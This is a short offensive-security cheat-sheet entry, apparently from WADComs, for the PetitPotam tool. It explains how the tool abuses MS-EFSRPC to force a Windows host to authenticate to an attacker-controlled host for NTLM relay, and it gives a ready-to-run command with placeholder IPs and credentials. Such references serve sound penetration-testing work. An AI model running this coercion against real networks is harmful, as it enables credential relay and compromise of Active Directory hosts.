Catalog WADComs

WAD · Tool

PetitPotam

1 technique Linux · Windows · ActiveDirectoryWADComs GPL-3.0

Execution

Execution LinuxWindowsActiveDirectory

PetitPotam leverages the MS-EFSRPC API to connect to a Windows host, hijack the authentication session, and trigger an authentication from the target host to an attacker controlled host (usually SMB or HTTP server). This captured authentication can then be relayed to authenticate to other hosts and perform more attacks. See more in ntlmrelayx.py. Command Reference: Target IP: 10.10.10.1 Attacker IP: 10.10.10.2 Domain: test.local Username: john Password: password123

python3 PetitPotam.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1
Native
Exploitation
Requires
Password, Username
Services
RPC, NTLM